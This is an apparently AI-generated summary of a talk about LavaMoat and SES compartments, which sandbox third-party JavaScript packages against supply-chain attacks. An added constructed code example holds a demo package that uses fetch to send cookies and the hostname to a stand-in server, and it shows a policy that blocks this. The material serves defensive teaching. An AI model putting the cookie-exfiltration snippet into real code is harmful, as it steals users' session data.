I Run Code From the Internet!
AI Generated Video Summary
1. Running Someone Else's Code and Ensuring Security
And then there's lockdown which makes sure that the entire environment around it, like global prototypes of object, array, and function, is put in a state where it's impossible to maliciously fiddle with them. So, no prototype pollution anymore.
And the good news is, this is becoming part of the language. Well, not yet! There's an early proposal for introducing compartments in TC39, and some of the people working on it are the people responsible for giving us 'use strict', Object.freeze, or Promises. So, I'm hoping this gets in. It's going to take a while, but we already have an implementation that works.
3. LavaMoat and Bundler
LavaMoat is not just for Node. There's also a bundler built on the same technology and ideas, using the same structure for policy. The current bundler for MetaMask in production is Browserify-based, but we're working on a Webpack plugin. It's a work in progress and open source. Join us if you want to help out. There are still details to figure out for perfect coverage of all Webpack features.
And LavaMoat is not just for Node. We're not at a Node-specific conference. There's also a bundler built on the same technology, on the same ideas, using the same structure for policy. And the bundler that we have working for MetaMask in production today is Browserify-based, because Browserify was the most flexible one of the bundlers. And that's been working for about two years now, if I recall correctly. And now we're working on getting a Webpack plugin. This is a work in progress and this is open source. So if you want to help out, please join us. There's a bunch of details about Webpack that we still need to figure out to have perfect coverage of all Webpack features. And there's a lot of Webpack features. So let me show you the Bundler now.
4. Application, Cookie Monster, and LavaMoat
This is an application, a very simple one, where it can import things, MJS, TypeScript, old packages, everything. And there is a package called cookiemonster that I made. And cookiemonster is giving us a random quote. And there is some environment available. Why am I showing you this? Because cookiemonster is not only giving us quotes. It's also stealing our cookies. So here's a fetch that sends our host name and cookie to the cookiemonster server.
This app is being built with webpack. There is nothing special about this configuration. It's super simple. And then this plugin. The codename for our LavaMoat plugin is ScorchWrap. Still a work in progress. Remember? And I have here examples of two builds. Let's run the build without ScorchWrap first. So if I refresh this page, I'm going to get a message sent to my server. This is a popup from my server. It has the chocolate chip name in the cookies. This is the fetch that happened and this is the application working. We get the quote from Cookie Monster but at what price? In here, this is a build where our plugin was enabled. If I run this, I get undefined instead. What happened here is that I have some diagnostics output. We've been looking at policies for app, leftpad and Cookie Monster. So the app has access to everything. Cookie Monster still gives us quotes. But it doesn't have access to location and document, because we didn't give it that access. This is for now implemented here in the runtime. I temporarily added these hardcoded, the policy in here. Policy for the runtime for webpack is yet to be implemented but Cookie Monster is only getting fetch, leftpad is getting nothing and then app is getting pretty much everything. And that's the policy set right now.
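The outcome of the two builds described above, as an added example that is not code from the talk or from LavaMoat: a constructed policy, constructed fake browser globals and a constructed `cookiemonster` body show why the exfiltrated values become `undefined` once only `fetch` is granted. All names, the policy shape and the URL are assumptions, and parameter shadowing here only models the policy decision; it is not a sandbox the way SES compartments are.

```javascript
// Constructed policy mirroring the talk: app gets everything,
// cookiemonster only fetch, leftpad nothing. Shape is hypothetical.
const policy = {
  app: { globals: { document: true, location: true, fetch: true } },
  cookiemonster: { globals: { fetch: true } },
  leftpad: { globals: {} },
};

// Constructed stand-ins for browser globals so this runs offline in Node.
function makeFakeBrowser() {
  const sent = [];
  const globals = {
    document: { cookie: 'chocolate=chip' },
    location: { hostname: 'app.example' },
    fetch: (url, opts) => { sent.push({ url, body: opts.body }); },
  };
  return { sent, globals };
}

// Constructed source for the hypothetical cookiemonster package:
// returns a quote, and also ships hostname and cookie to its server.
const cookiemonsterSource = `
  const cookie = document === undefined ? undefined : document.cookie;
  const host = location === undefined ? undefined : location.hostname;
  fetch('https://cookiemonster.example/collect', { body: { host, cookie } });
  return 'Me want cookie!';
`;

// Run a package body with every known global shadowed by a parameter;
// only names the policy grants receive the real value, the rest are undefined.
function runPackage(name, source, pol, browserGlobals) {
  const granted = (pol[name] && pol[name].globals) || {};
  const names = Object.keys(browserGlobals);
  const values = names.map((n) => (granted[n] === true ? browserGlobals[n] : undefined));
  return new Function(...names, `"use strict";${source}`)(...values);
}

// Same package, two builds: one with no restrictions, one under the policy.
function demo() {
  const plain = makeFakeBrowser();
  const allowAll = { cookiemonster: policy.app };
  const quotePlain = runPackage('cookiemonster', cookiemonsterSource, allowAll, plain.globals);
  const guarded = makeFakeBrowser();
  const quoteGuarded = runPackage('cookiemonster', cookiemonsterSource, policy, guarded.globals);
  return { quotePlain, quoteGuarded, leakedPlain: plain.sent[0].body, leakedGuarded: guarded.sent[0].body };
}
```

The package still returns its quote and can still call `fetch` under the policy, but the payload it sends carries no cookie or hostname.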